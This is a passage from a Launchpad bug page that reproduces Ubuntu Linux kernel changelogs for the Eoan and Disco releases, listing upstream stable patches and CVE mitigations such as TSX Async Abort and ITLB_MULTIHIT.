    - EDAC/amd64: Decode syndrome before translating address
    - ARM: at91: move platform-specific asm-offset.h to arch/arm/mach-at91
    - soc: renesas: rmobile-sysc: Set GENPD_FLAG_ALWAYS_ON for always-on domain
    - soc: renesas: Enable ARM_ERRATA_754322 for affected Cortex-A9
    - PM / devfreq: Fix kernel oops on governor module load
    - ARM: OMAP2+: move platform-specific asm-offset.h to arch/arm/mach-omap2
    - PM / devfreq: passive: Use non-devm notifiers
    - PM / devfreq: exynos-bus: Correct clock enable sequence
    - media: cec-notifier: clear cec_adap in cec_notifier_unregister
    - media: saa7146: add cleanup in hexium_attach()
    - media: cpia2_usb: fix memory leaks
    - media: saa7134: fix terminology around saa7134_i2c_eeprom_md7134_gate()
    - perf trace beauty ioctl: Fix off-by-one error in cmd->string table
    - perf report: Fix --ns time sort key output
    - perf script: Fix memory leaks in list_scripts()
    - media: aspeed-video: address a protential usage of an unitialized var
    - media: ov9650: add a sanity check
    - leds: lm3532: Fixes for the driver for stability
    - ASoC: es8316: fix headphone mixer volume table
    - ACPI / CPPC: do not require the _PSD method
    - sched/cpufreq: Align trace event behavior of fast switching
    - arm64: dts: meson: fix boards regulators states format
    - x86/apic/vector: Warn when vector space exhaustion breaks affinity
    - arm64: kpti: ensure patched kernel text is fetched from PoU
    - perf evlist: Use unshare(CLONE_FS) in sb threads to let setns(CLONE_NEWNS)
      work
    - arm64: Use correct ll/sc atomic constraints
    - jump_label: Don't warn on __exit jump entries
    - x86/mm/pti: Do not invoke PTI functions when PTI is disabled
    - ASoC: fsl_ssi: Fix clock control issue in master mode
    - x86/mm/pti: Handle unaligned address gracefully in pti_clone_pagetable()
    - nvmet: fix data units read and written counters in SMART log
    - nvme-multipath: fix ana log nsid lookup when nsid is not found
    - ALSA: firewire-motu: add support for MOTU 4pre
    - iommu/amd: Silence warnings under memory pressure
    - ASoC: Intel: Haswell: Adjust machine device private context
    - libata/ahci: Drop PCS quirk for Denverton and beyond
    - iommu/iova: Avoid false sharing on fq_timer_on
    - libtraceevent: Change users plugin directory
    - ASoC: dt-bindings: sun4i-spdif: Fix dma-names warning
    - ARM: dts: exynos: Mark LDO10 as always-on on Peach Pit/Pi Chromebooks
    - x86/amd_nb: Add PCI device IDs for family 17h, model 70h
    - ACPI: custom_method: fix memory leaks
    - ACPI / PCI: fix acpi_pci_irq_enable() memory leak
    - closures: fix a race on wakeup from closure_sync
    - hwmon: (k10temp) Add support for AMD family 17h, model 70h CPUs
    - hwmon: (acpi_power_meter) Change log level for 'unsafe software power cap'
    - md/raid1: fail run raid1 array when active disk less than one
    - dmaengine: ti: edma: Do not reset reserved paRAM slots
    - kprobes: Prohibit probing on BUG() and WARN() address
    - x86/mm: Fix cpumask_of_node() error condition
    - irqchip/sifive-plic: set max threshold for ignored handlers
    - s390/crypto: xts-aes-s390 fix extra run-time crypto self tests finding
    - irqchip/gic-v3-its: Fix LPI release for Multi-MSI devices
    - x86/cpu: Add Tiger Lake to Intel family
    - platform/x86: intel_pmc_core: Do not ioremap RAM
    - platform/x86: intel_pmc_core_pltdrv: Module removal warning fix
    - ASoC: dmaengine: Make the pcm->name equal to pcm->id if the name is not set
    - tools/power/x86/intel-speed-select: Fix memory leak
    - spi: bcm2835: Work around DONE bit erratum
    - io_uring: fix wrong sequence setting logic
    - block: make rq sector size accessible for block stats
    - raid5: don't set STRIPE_HANDLE to stripe which is in batch list
    - mmc: core: Clarify sdio_irq_pending flag for MMC_CAP2_SDIO_IRQ_NOTHREAD
    - sched/psi: Correct overly pessimistic size calculation
    - mmc: sdhci: Fix incorrect switch to HS mode
    - mmc: core: Add helper function to indicate if SDIO IRQs is enabled
    - mmc: dw_mmc: Re-store SDIO IRQs mask at system resume
    - raid5: don't increment read_errors on EILSEQ return
    - mmc: mtk-sd: Re-store SDIO IRQs mask at system resume
    - libertas: Add missing sentinel at end of if_usb.c fw_table
    - ALSA: hda - Add a quirk model for fixing Huawei Matebook X right speaker
    - ALSA: hda - Drop unsol event handler for Intel HDMI codecs
    - drm/amd/powerplay/smu7: enforce minimal VBITimeout (v2)
    - media: ttusb-dec: Fix info-leak in ttusb_dec_send_command()
    - drm: fix module name in edid_firmware log message
    - ALSA: hda/realtek - Blacklist PC beep for Lenovo ThinkCentre M73/93
    - zd1211rw: remove false assertion from zd_mac_clear()
    - btrfs: delayed-inode: Kill the BUG_ON() in btrfs_delete_delayed_dir_index()
    - btrfs: extent-tree: Make sure we only allocate extents from block groups
      with the same type
    - btrfs: tree-checker: Add ROOT_ITEM check
    - btrfs: Detect unbalanced tree with empty leaf before crashing btree
      operations
    - kvm: Nested KVM MMUs need PAE root too
    - media: omap3isp: Set device on omap3isp subdevs
    - PM / devfreq: passive: fix compiler warning
    - ARM: dts: logicpd-torpedo-baseboard: Fix missing video
    - ARM: omap2plus_defconfig: Fix missing video
    - iwlwifi: fw: don't send GEO_TX_POWER_LIMIT command to FW version 36
    - ALSA: firewire-tascam: handle error code when getting current source of
      clock
    - ALSA: firewire-tascam: check intermediate state of clock status and retry
    - scsi: scsi_dh_rdac: zero cdb in send_mode_select()
    - scsi: qla2xxx: Fix Relogin to prevent modifying scan_state flag
    - printk: Do not lose last line in kmsg buffer dump
    - IB/mlx5: Free mpi in mp_slave mode
    - IB/hfi1: Define variables as unsigned long to fix KASAN warning
    - IB/hfi1: Do not update hcrc for a KDETH packet during fault injection
    - RDMA: Fix double-free in srq creation error flow
    - randstruct: Check member structs in is_pure_ops_struct()
    - ARM: dts: am3517-evm: Fix missing video
    - rcu/tree: Fix SCHED_FIFO params
    - ALSA: hda/realtek - PCI quirk for Medion E4254
    - blk-mq: add callback of .cleanup_rq
    - scsi: implement .cleanup_rq callback
    - powerpc/imc: Dont create debugfs files for cpu-less nodes
    - tpm_tis_core: Turn on the TPM before probing IRQ's
    - tpm_tis_core: Set TPM_CHIP_FLAG_IRQ before probing for interrupts
    - tpm: Wrap the buffer from the caller to tpm_buf in tpm_send()
    - fuse: fix deadlock with aio poll and fuse_iqueue::waitq.lock
    - fuse: fix missing unlock_page in fuse_writepage()
    - fuse: fix beyond-end-of-page access in fuse_parse_cache()
    - parisc: Disable HP HSC-PCI Cards to prevent kernel crash
    - platform/x86: intel_int0002_vgpio: Fix wakeups not working on Cherry Trail
    - KVM: x86: always stop emulation on page fault
    - KVM: x86: set ctxt->have_exception in x86_decode_insn()
    - KVM: x86: Manually calculate reserved bits when loading PDPTRS
    - KVM: x86: Disable posted interrupts for non-standard IRQs delivery modes
    - kvm: x86: Add "significant index" flag to a few CPUID leaves
    - KVM: x86/mmu: Use fast invalidate mechanism to zap MMIO sptes
    - media: videobuf-core.c: poll_wait needs a non-NULL buf pointer
    - media: sn9c20x: Add MSI MS-1039 laptop to flip_dmi_table
    - media: hantro: Set DMA max segment size
    - media: don't drop front-end reference count for ->detach
    - media: vivid: fix device init when no_error_inj=1 and fb disabled
    - spi: ep93xx: Repair SPI CS lookup tables
    - spi: spi-fsl-dspi: Exit the ISR with IRQ_NONE when it's not ours
    - binfmt_elf: Do not move brk for INTERP-less ET_EXEC
    - ASoC: Intel: NHLT: Fix debug print format
    - ASoC: Intel: Skylake: Use correct function to access iomem space
    - ASoC: Intel: Fix use of potentially uninitialized variable
    - staging: erofs: cannot set EROFS_V_Z_INITED_BIT if fill_inode_lazy fails
    - ARM: samsung: Fix system restart on S3C6410
    - ARM: zynq: Use memcpy_toio instead of memcpy on smp bring-up
    - arm64: tlb: Ensure we execute an ISB following walk cache invalidation
    - arm64: dts: rockchip: limit clock rate of MMC controllers for RK3328
    - iommu/arm-smmu-v3: Disable detection of ATS and PRI
    - alarmtimer: Use EOPNOTSUPP instead of ENOTSUPP
    - iommu/vt-d: Fix wrong analysis whether devices share the same bus
    - regulator: Defer init completion for a while after late_initcall
    - efifb: BGRT: Improve efifb_bgrt_sanity_check
    - gfs2: clear buf_in_tr when ending a transaction in sweep_bh_for_rgrps
    - z3fold: fix retry mechanism in page reclaim
    - z3fold: fix memory leak in kmem cache
    - mm/compaction.c: clear total_{migrate,free}_scanned before scanning a new
      zone
    - memcg, oom: don't require __GFP_FS when invoking memcg OOM killer
    - memcg, kmem: do not fail __GFP_NOFAIL charges
    - lib/lzo/lzo1x_compress.c: fix alignment bug in lzo-rle
    - mt76: round up length on mt76_wr_copy
    - KEYS: trusted: correctly initialize digests and fix locking issue
    - ath10k: fix channel info parsing for non tlv target
    - i40e: check __I40E_VF_DISABLE bit in i40e_sync_filters_subtask
    - block: mq-deadline: Fix queue restart handling
    - block: fix null pointer dereference in blk_mq_rq_timed_out()
    - smb3: allow disabling requesting leases
    - smb3: fix unmount hang in open_shroot
    - smb3: fix leak in "open on server" perf counter
    - ovl: Fix dereferencing possible ERR_PTR()
    - ovl: filter of trusted xattr results in audit
    - btrfs: fix allocation of free space cache v1 bitmap pages
    - Btrfs: fix use-after-free when using the tree modification log
    - btrfs: Relinquish CPUs in btrfs_compare_trees
    - btrfs: adjust dirty_metadata_bytes after writeback failure of extent buffer
    - btrfs: qgroup: Fix the wrong target io_tree when freeing reserved data space
    - btrfs: qgroup: Fix reserved data space leak if we have multiple reserve
      calls
    - Btrfs: fix race setting up and completing qgroup rescan workers
    - btrfs: Fix a regression which we can't convert to SINGLE profile
    - SUNRPC: Dequeue the request from the receive queue while we're re-encoding
    - SUNRPC: Fix buffer handling of GSS MIC without slack
    - ACPI / LPSS: Save/restore LPSS private registers also on Lynxpoint
    - md/raid6: Set R5_ReadError when there is read failure on parity disk
    - md: don't report active array_state until after revalidate_disk() completes.
    - md: only call set_in_sync() when it is expected to succeed.
    - cfg80211: Purge frame registrations on iftype change
    - /dev/mem: Bail out upon SIGKILL.
    - fs: Export generic_fadvise()
    - mm: Handle MADV_WILLNEED through vfs_fadvise()
    - xfs: Fix stale data exposure when readahead races with hole punch
    - ipmi: move message error checking to avoid deadlock
    - mtd: rawnand: stm32_fmc2: avoid warnings when building with W=1 option
    - ext4: fix warning inside ext4_convert_unwritten_extents_endio
    - ext4: fix punch hole for inline_data file systems
    - quota: fix wrong condition in is_quota_modification()
    - hwrng: core - don't wait on add_early_randomness()
    - i2c: riic: Clear NACK in tend isr
    - CIFS: fix max ea value size
    - CIFS: Fix oplock handling for SMB 2.1+ protocols
    - drm/amd/display: Restore backlight brightness after system resume
    - drm/amd/display: dce11.x /dce12 update formula input
    - drm/amd/display: Add missing HBM support and raise Vega20's uclk.
    - drm/amdgpu/display: fix 64 bit divide
    - md/raid0: avoid RAID0 data corruption due to layout confusion.
    - mt76: mt7615: always release sem in mt7615_load_patch
    - mt76: mt7615: fix mt7615 firmware path definitions
    - platform/chrome: cros_ec_rpmsg: Fix race with host command when probe failed
    - Linux 5.3.4

* ELAN469D touch pad not working (LP: #1795292) // Ubuntu won't boot on Dell
    Inspiron 7375 (LP: #1837688) // Eoan update: v5.3.4 upstream stable release
    (LP: #1848046)
    - iommu/amd: Override wrong IVRS IOAPIC on Raven Ridge systems

* Eoan update: v5.3.3 upstream stable release (LP: #1848045)
    - Linux 5.3.2
    - Revert "Linux 5.3.2"
    - Linux 5.3.3

* Eoan update: v5.3.2 upstream stable release (LP: #1848042)
    - netfilter: add missing IS_ENABLED(CONFIG_NF_TABLES) check to header-file.
    - clocksource/drivers/timer-of: Do not warn on deferred probe
    - clocksource/drivers: Do not warn on probe defer
    - drm/amd/display: Allow cursor async updates for framebuffer swaps
    - drm/amd/display: Skip determining update type for async updates
    - drm/amd/display: Don't replace the dc_state for fast updates
    - drm/amd/display: readd -msse2 to prevent Clang from emitting libcalls to
      undefined SW FP routines
    - powerpc/xive: Fix bogus error code returned by OPAL
    - HID: prodikeys: Fix general protection fault during probe
    - HID: sony: Fix memory corruption issue on cleanup.
    - HID: logitech: Fix general protection fault caused by Logitech driver
    - HID: logitech-dj: Fix crash when initial logi_dj_recv_query_paired_devices
      fails
    - HID: hidraw: Fix invalid read in hidraw_ioctl
    - HID: Add quirk for HP X500 PIXART OEM mouse
    - mtd: cfi_cmdset_0002: Use chip_good() to retry in do_write_oneword()
    - crypto: talitos - fix missing break in switch statement
    - clk: imx: imx8mm: fix audio pll setting
    - Revert "mm/z3fold.c: fix race between migration and destruction"
    - ALSA: usb-audio: Add Hiby device family to quirks for native DSD support
    - ALSA: usb-audio: Add DSD support for EVGA NU Audio
    - ALSA: dice: fix wrong packet parameter for Alesis iO26
    - ALSA: hda - Add laptop imic fixup for ASUS M9V laptop
    - ALSA: hda - Apply AMD controller workaround for Raven platform
    - platform/x86: i2c-multi-instantiate: Derive the device name from parent
    - objtool: Clobber user CFLAGS variable
    - Linux 5.3.2

* Check for CPU Measurement sampling (LP: #1847590)
    - s390/cpumsf: Check for CPU Measurement sampling

* revert the revert of ext4: make __ext4_get_inode_loc plug (LP: #1846486)
    - random: try to actively add entropy rather than passively wait for it
    - Revert "Revert "ext4: make __ext4_get_inode_loc plug""

* Fix non-working Realtek USB ethernet after system resume (LP: #1847063)
    - r8152: Set macpassthru in reset_resume callback

* overlayfs: allow with shiftfs as underlay (LP: #1846272)
    - SAUCE: overlayfs: allow with shiftfs as underlay

* [regression] NoNewPrivileges incompatible with Apparmor (LP: #1844186)
    - SAUCE: apparmor: fix nnp subset test for unconfined

* PM / hibernate: fix potential memory corruption (LP: #1847118)
    - PM / hibernate: memory_bm_find_bit(): Tighten node optimisation

* Miscellaneous Ubuntu changes
    - update dkms package versions

-- Stefan Bader <stefan.bader@canonical.com>  Sat, 09 Nov 2019 17:11:10 +0100

Changed in linux (Ubuntu Eoan):
status:	Fix Committed → Fix Released

Revision history for this message

Launchpad Janitor (janitor) wrote on 2019-11-12:

#21

Download full text (38.6 KiB)

This bug was fixed in the package linux - 5.0.0-35.38

---------------
linux (5.0.0-35.38) disco; urgency=medium

  * [REGRESSION] md/raid0: cannot assemble multi-zone RAID0 with default_layout
    setting (LP: #1849682)
    - SAUCE: Fix revert "md/raid0: avoid RAID0 data corruption due to layout
      confusion."

  * CVE-2018-12207
    - kvm: Convert kvm_lock to a mutex
    - kvm: x86: Do not release the page inside mmu_set_spte()
    - KVM: x86: make FNAME(fetch) and __direct_map more similar
    - KVM: x86: remove now unneeded hugepage gfn adjustment
    - KVM: x86: change kvm_mmu_page_get_gfn BUG_ON to WARN_ON
    - KVM: x86: add tracepoints around __direct_map and FNAME(fetch)
    - kvm: x86, powerpc: do not allow clearing largepages debugfs entry
    - SAUCE: KVM: vmx, svm: always run with EFER.NXE=1 when shadow paging is
      active
    - SAUCE: x86: Add ITLB_MULTIHIT bug infrastructure
    - SAUCE: kvm: mmu: ITLB_MULTIHIT mitigation
    - SAUCE: kvm: Add helper function for creating VM worker threads
    - SAUCE: kvm: x86: mmu: Recovery of shattered NX large pages
    - SAUCE: cpu/speculation: Uninline and export CPU mitigations helpers
    - SAUCE: kvm: x86: mmu: Apply global mitigations knob to ITLB_MULTIHIT

  * CVE-2019-11135
    - KVM: x86: use Intel speculation bugs and features as derived in generic x86
      code
    - x86/msr: Add the IA32_TSX_CTRL MSR
    - x86/cpu: Add a helper function x86_read_arch_cap_msr()
    - x86/cpu: Add a "tsx=" cmdline option with TSX disabled by default
    - x86/speculation/taa: Add mitigation for TSX Async Abort
    - x86/speculation/taa: Add sysfs reporting for TSX Async Abort
    - kvm/x86: Export MDS_NO=0 to guests when TSX is enabled
    - x86/tsx: Add "auto" option to the tsx= cmdline parameter
    - x86/speculation/taa: Add documentation for TSX Async Abort
    - x86/tsx: Add config options to set tsx=on|off|auto
    - SAUCE: x86/speculation/taa: Call tsx_init()
    - [Config] Disable TSX by default when possible

  * CVE-2019-0154
    - SAUCE: drm/i915: Lower RM timeout to avoid DSI hard hangs
    - SAUCE: drm/i915/gen8+: Add RC6 CTX corruption WA

linux (5.0.0-34.36) disco; urgency=medium

* disco/linux: <version to be filled> -proposed tracker (LP: #1850574)

* [REGRESSION] md/raid0: cannot as...

This bug was fixed in the package linux - 5.0.0-35.38

---------------
linux (5.0.0-35.38) disco; urgency=medium

* [REGRESSION]  md/raid0: cannot assemble multi-zone RAID0 with default_layout
    setting (LP: #1849682)
    - SAUCE: Fix revert "md/raid0: avoid RAID0 data corruption due to layout
      confusion."

* CVE-2019-0154
    - SAUCE: drm/i915: Lower RM timeout to avoid DSI hard hangs
    - SAUCE: drm/i915/gen8+: Add RC6 CTX corruption WA

linux (5.0.0-34.36) disco; urgency=medium

* disco/linux: <version to be filled> -proposed tracker (LP: #1850574)

* [REGRESSION]  md/raid0: cannot assemble multi-zone RAID0 with default_layout
    setting (LP: #1849682)
    - Revert "md/raid0: avoid RAID0 data corruption due to layout confusion."

linux (5.0.0-33.35) disco; urgency=medium

* disco/linux: 5.0.0-33.35 -proposed tracker (LP: #1849003)

* Disco update: upstream stable patchset 2019-10-18 (LP: #1848817)
    - tpm: use tpm_try_get_ops() in tpm-sysfs.c.
    - drm/bridge: tc358767: Increase AUX transfer length limit
    - drm/panel: simple: fix AUO g185han01 horizontal blanking
    - video: ssd1307fb: Start page range at page_offset
    - drm/stm: attach gem fence to atomic state
    - drm/panel: check failure cases in the probe func
    - drm/rockchip: Check for fast link training before enabling psr
    - drm/radeon: Fix EEH during kexec
    - gpu: drm: radeon: Fix a possible null-pointer dereference in
      radeon_connector_set_property()
    - PCI: rpaphp: Avoid a sometimes-uninitialized warning
    - ipmi_si: Only schedule continuously in the thread in maintenance mode
    - clk: qoriq: Fix -Wunused-const-variable
    - clk: sunxi-ng: v3s: add missing clock slices for MMC2 module clocks
    - drm/amd/display: fix issue where 252-255 values are clipped
    - drm/amd/display: reprogram VM config when system resume
    - powerpc/powernv/ioda2: Allocate TCE table levels on demand for default DMA
      window
    - clk: actions: Don't reference clk_init_data after registration
    - clk: sirf: Don't reference clk_init_data after registration
    - clk: sprd: Don't reference clk_init_data after registration
    - clk: zx296718: Don't reference clk_init_data after registration
    - powerpc/xmon: Check for HV mode when dumping XIVE info from OPAL
    - powerpc/rtas: use device model APIs and serialization during LPM
    - powerpc/futex: Fix warning: 'oldval' may be used uninitialized in this
      function
    - powerpc/pseries/mobility: use cond_resched when updating device tree
    - pinctrl: tegra: Fix write barrier placement in pmx_writel
    - powerpc/eeh: Clear stale EEH_DEV_NO_HANDLER flag
    - vfio_pci: Restore original state on release
    - drm/nouveau/volt: Fix for some cards having 0 maximum voltage
    - pinctrl: amd: disable spurious-firing GPIO IRQs
    - clk: renesas: mstp: Set GENPD_FLAG_ALWAYS_ON for clock domain
    - clk: renesas: cpg-mssr: Set GENPD_FLAG_ALWAYS_ON for clock domain
    - drm/amd/display: support spdif
    - drm/amdgpu/si: fix ASIC tests
    - powerpc/64s/exception: machine check use correct cfar for late handler
    - pstore: fs superblock limits
    - clk: qcom: gcc-sdm845: Use floor ops for sdcc clks
    - powerpc/pseries: correctly track irq state in default idle
    - pinctrl: meson-gxbb: Fix wrong pinning definition for uart_c
    - arm64: fix unreachable code issue with cmpxchg
    - clk: at91: select parent if main oscillator or bypass is enabled
    - powerpc: dump kernel log before carrying out fadump or kdump
    - mbox: qcom: add APCS child device for QCS404
    - clk: sprd: add missing kfree
    - scsi: core: Reduce memory required for SCSI logging
    - dma-buf/sw_sync: Synchronize signal vs syncpt free
    - ext4: fix potential use after free after remounting with noblock_validity
    - MIPS: Ingenic: Disable broken BTB lookup optimization.
    - MIPS: tlbex: Explicitly cast _PAGE_NO_EXEC to a boolean
    - i2c-cht-wc: Fix lockdep warning
    - PCI: tegra: Fix OF node reference leak
    - HID: wacom: Fix several minor compiler warnings
    - livepatch: Nullify obj->mod in klp_module_coming()'s error path
    - ARM: 8898/1: mm: Don't treat faults reported from cache maintenance as
      writes
    - soundwire: intel: fix channel number reported by hardware
    - ARM: 8875/1: Kconfig: default to AEABI w/ Clang
    - rtc: snvs: fix possible race condition
    - rtc: pcf85363/pcf85263: fix regmap error in set_time
    - HID: apple: Fix stuck function keys when using FN
    - PCI: rockchip: Propagate errors for optional regulators
    - PCI: histb: Propagate errors for optional regulators
    - PCI: imx6: Propagate errors for optional regulators
    - PCI: exynos: Propagate errors for optional PHYs
    - security: smack: Fix possible null-pointer dereferences in
      smack_socket_sock_rcv_skb()
    - ARM: 8903/1: ensure that usable memory in bank 0 starts from a PMD-aligned
      address
    - fat: work around race with userspace's read via blockdev while mounting
    - pktcdvd: remove warning on attempting to register non-passthrough dev
    - hypfs: Fix error number left in struct pointer member
    - crypto: hisilicon - Fix double free in sec_free_hw_sgl()
    - kbuild: clean compressed initramfs image
    - ocfs2: wait for recovering done after direct unlock request
    - kmemleak: increase DEBUG_KMEMLEAK_EARLY_LOG_SIZE default to 16K
    - arm64: consider stack randomization for mmap base only when necessary
    - mips: properly account for stack randomization and stack guard gap
    - arm: properly account for stack randomization and stack guard gap
    - arm: use STACK_TOP when computing mmap base address
    - bpf: fix use after free in prog symbol exposure
    - cxgb4:Fix out-of-bounds MSI-X info array access
    - erspan: remove the incorrect mtu limit for erspan
    - hso: fix NULL-deref on tty open
    - ipv6: drop incoming packets having a v4mapped source address
    - ipv6: Handle missing host route in __ipv6_ifa_notify
    - net: ipv4: avoid mixed n_redirects and rate_tokens usage
    - net: qlogic: Fix memory leak in ql_alloc_large_buffers
    - net: Unpublish sk from sk_reuseport_cb before call_rcu
    - nfc: fix memory leak in llcp_sock_bind()
    - qmi_wwan: add support for Cinterion CLS8 devices
    - rxrpc: Fix rxrpc_recvmsg tracepoint
    - sch_dsmark: fix potential NULL deref in dsmark_init()
    - udp: fix gso_segs calculations
    - vsock: Fix a lockdep warning in __vsock_release()
    - net: dsa: rtl8366: Check VLAN ID and not ports
    - udp: only do GSO if # of segs > 1
    - net/rds: Fix error handling in rds_ib_add_one()
    - xen-netfront: do not use ~0U as error return value for xennet_fill_frags()
    - tipc: fix unlimited bundling of small messages
    - sch_cbq: validate TCA_CBQ_WRROPT to avoid crash
    - soundwire: Kconfig: fix help format
    - soundwire: fix regmap dependencies and align with other serial links
    - Smack: Don't ignore other bprm->unsafe flags if LSM_UNSAFE_PTRACE is set
    - smack: use GFP_NOFS while holding inode_smack::smk_lock
    - NFC: fix attrs checks in netlink interface
    - kexec: bail out upon SIGKILL when allocating memory.
    - 9p/cache.c: Fix memory leak in v9fs_cache_session_get_cookie
    - drm/vkms: Fix crc worker races
    - drm/vkms: Avoid assigning 0 for possible_crtc
    - drm/amd/display: add monitor patch to add T7 delay
    - drm/tinydrm/Kconfig: drivers: Select BACKLIGHT_CLASS_DEVICE
    - clk: imx8mq: Mark AHB clock as critical
    - drm/amd/display: Fix frames_to_insert math
    - clk: meson: axg-audio: Don't reference clk_init_data after registration
    - powerpc/64s/radix: Fix memory hotplug section page table creation
    - selftests/powerpc: Retry on host facility unavailable
    - powerpc/eeh: Clean up EEH PEs after recovery finishes
    - mailbox: mediatek: cmdq: clear the event in cmdq initial flow
    - clk: Make clk_bulk_get_all() return a valid "id"
    - f2fs: fix to drop meta/node pages during umount
    - MIPS: Don't use bc_false uninitialized in __mm_isBranchInstr
    - PCI: pci-hyperv: Fix build errors on non-SYSFS config
    - PCI: Add pci_info_ratelimited() to ratelimit PCI separately
    - PCI: Use static const struct, not const static struct
    - ARM: 8905/1: Emit __gnu_mcount_nc when using Clang 10.0.0 or newer
    - KVM: hyperv: Fix Direct Synthetic timers assert an interrupt w/o
      lapic_in_kernel
    - clk: ingenic/jz4740: Fix "pll half" divider not read/written properly
    - clk: sunxi: Don't call clk_hw_get_name() on a hw that isn't registered
    - ARM: dts: dir685: Drop spi-cpol from the display
    - mm: add dummy can_do_mlock() helper
    - [Config] updateconfigs for SOUNDWIRE

* [CML] New device IDs for CML-U (LP: #1843774)
    - spi-nor: intel-spi: Add support for Intel Comet Lake SPI serial flash

* [CML-U] Comet lake platform need ISH driver support (LP: #1843775)
    - HID: intel-ish-hid: Add Comet Lake PCI device ID

* CVE-2019-17666
    - SAUCE: rtlwifi: rtl8822b: Fix potential overflow on P2P code
    - SAUCE: rtlwifi: Fix potential overflow on P2P code

* seccomp: add SECCOMP_USER_NOTIF_FLAG_CONTINUE    (LP: #1847744)
    - SAUCE: seccomp: add SECCOMP_USER_NOTIF_FLAG_CONTINUE
    - SAUCE: seccomp: test SECCOMP_USER_NOTIF_FLAG_CONTINUE

* fdatasync performance regression on 5.0 kernels (LP: #1847641)
    - blk-wbt: fix performance regression in wbt scale_up/scale_down

* bcache: Performance degradation when querying priority_stats (LP: #1840043)
    - bcache: add cond_resched() in __bch_cache_cmp()

* Add installer support for iwlmvm adapters (LP: #1848236)
    - d-i: Add iwlmvm to nic-modules

* Check for CPU Measurement sampling (LP: #1847590)
    - s390/cpumsf: Check for CPU Measurement sampling

* Disco update: upstream stable patchset 2019-10-16 (LP: #1848367)
    - arcnet: provide a buffer big enough to actually receive packets
    - cdc_ncm: fix divide-by-zero caused by invalid wMaxPacketSize
    - macsec: drop skb sk before calling gro_cells_receive
    - net/phy: fix DP83865 10 Mbps HDX loopback disable function
    - net: qrtr: Stop rx_worker before freeing node
    - net/sched: act_sample: don't push mac header on ip6gre ingress
    - net_sched: add max len check for TCA_KIND
    - nfp: flower: fix memory leak in nfp_flower_spawn_vnic_reprs
    - openvswitch: change type of UPCALL_PID attribute to NLA_UNSPEC
    - ppp: Fix memory leak in ppp_write
    - sch_netem: fix a divide by zero in tabledist()
    - skge: fix checksum byte order
    - usbnet: ignore endpoints with invalid wMaxPacketSize
    - usbnet: sanity checking of packet sizes and device mtu
    - net: sched: fix possible crash in tcf_action_destroy()
    - tcp: better handle TCP_USER_TIMEOUT in SYN_SENT state
    - net/mlx5: Add device ID of upcoming BlueField-2
    - nfp: flower: prevent memory leak in nfp_flower_spawn_phy_reprs
    - ALSA: hda: Flush interrupts on disabling
    - regulator: lm363x: Fix off-by-one n_voltages for lm3632 ldo_vpos/ldo_vneg
    - ASoC: tlv320aic31xx: suppress error message for EPROBE_DEFER
    - ASoC: sgtl5000: Fix of unmute outputs on probe
    - ASoC: sgtl5000: Fix charge pump source assignment
    - firmware: qcom_scm: Use proper types for dma mappings
    - dmaengine: bcm2835: Print error in case setting DMA mask fails
    - leds: leds-lp5562 allow firmware files up to the maximum length
    - media: dib0700: fix link error for dibx000_i2c_set_speed
    - media: mtk-cir: lower de-glitch counter for rc-mm protocol
    - media: exynos4-is: fix leaked of_node references
    - media: hdpvr: Add device num check and handling
    - media: i2c: ov5640: Check for devm_gpiod_get_optional() error
    - time/tick-broadcast: Fix tick_broadcast_offline() lockdep complaint
    - sched/fair: Fix imbalance due to CPU affinity
    - sched/core: Fix CPU controller for !RT_GROUP_SCHED
    - x86/apic: Make apic_pending_intr_clear() more robust
    - sched/deadline: Fix bandwidth accounting at all levels after offline
      migration
    - x86/reboot: Always use NMI fallback when shutdown via reboot vector IPI
      fails
    - x86/apic: Soft disable APIC before initializing it
    - ALSA: hda - Show the fatal CORB/RIRB error more clearly
    - ALSA: i2c: ak4xxx-adda: Fix a possible null pointer dereference in
      build_adc_controls()
    - EDAC/mc: Fix grain_bits calculation
    - media: iguanair: add sanity checks
    - base: soc: Export soc_device_register/unregister APIs
    - ALSA: usb-audio: Skip bSynchAddress endpoint check if it is invalid
    - ia64:unwind: fix double free for mod->arch.init_unw_table
    - EDAC/altera: Use the proper type for the IRQ status bits
    - ASoC: rsnd: don't call clk_get_rate() under atomic context
    - arm64/prefetch: fix a -Wtype-limits warning
    - md/raid1: end bio when the device faulty
    - md: don't call spare_active in md_reap_sync_thread if all member devices
      can't work
    - md: don't set In_sync if array is frozen
    - media: media/platform: fsl-viu.c: fix build for MICROBLAZE
    - ACPI / processor: don't print errors for processorIDs == 0xff
    - loop: Add LOOP_SET_DIRECT_IO to compat ioctl
    - EDAC, pnd2: Fix ioremap() size in dnv_rd_reg()
    - efi: cper: print AER info of PCIe fatal error
    - firmware: arm_scmi: Check if platform has released shmem before using
    - sched/fair: Use rq_lock/unlock in online_fair_sched_group
    - idle: Prevent late-arriving interrupts from disrupting offline
    - media: gspca: zero usb_buf on error
    - perf config: Honour $PERF_CONFIG env var to specify alternate .perfconfig
    - perf test vfs_getname: Disable ~/.perfconfig to get default output
    - media: mtk-mdp: fix reference count on old device tree
    - media: fdp1: Reduce FCP not found message level to debug
    - media: em28xx: modules workqueue not inited for 2nd device
    - media: rc: imon: Allow iMON RC protocol for ffdc 7e device
    - dmaengine: iop-adma: use correct printk format strings
    - perf record: Support aarch64 random socket_id assignment
    - media: vsp1: fix memory leak of dl on error return path
    - media: i2c: ov5645: Fix power sequence
    - media: omap3isp: Don't set streaming state on random subdevs
    - media: imx: mipi csi-2: Don't fail if initial state times-out
    - net: lpc-enet: fix printk format strings
    - m68k: Prevent some compiler warnings in Coldfire builds
    - ARM: dts: imx7d: cl-som-imx7: make ethernet work again
    - ARM: dts: imx7-colibri: disable HS400
    - media: radio/si470x: kill urb on error
    - media: hdpvr: add terminating 0 at end of string
    - ASoC: uniphier: Fix double reset assersion when transitioning to suspend
      state
    - tools headers: Fixup bitsperlong per arch includes
    - ASoC: sun4i-i2s: Don't use the oversample to calculate BCLK
    - led: triggers: Fix a memory leak bug
    - nbd: add missing config put
    - media: mceusb: fix (eliminate) TX IR signal length limit
    - media: dvb-frontends: use ida for pll number
    - posix-cpu-timers: Sanitize bogus WARNONS
    - media: dvb-core: fix a memory leak bug
    - libperf: Fix alignment trap with xyarray contents in 'perf stat'
    - EDAC/amd64: Recognize DRAM device type ECC capability
    - EDAC/amd64: Decode syndrome before translating address
    - PM / devfreq: passive: Use non-devm notifiers
    - PM / devfreq: exynos-bus: Correct clock enable sequence
    - media: cec-notifier: clear cec_adap in cec_notifier_unregister
    - media: saa7146: add cleanup in hexium_attach()
    - media: cpia2_usb: fix memory leaks
    - media: saa7134: fix terminology around saa7134_i2c_eeprom_md7134_gate()
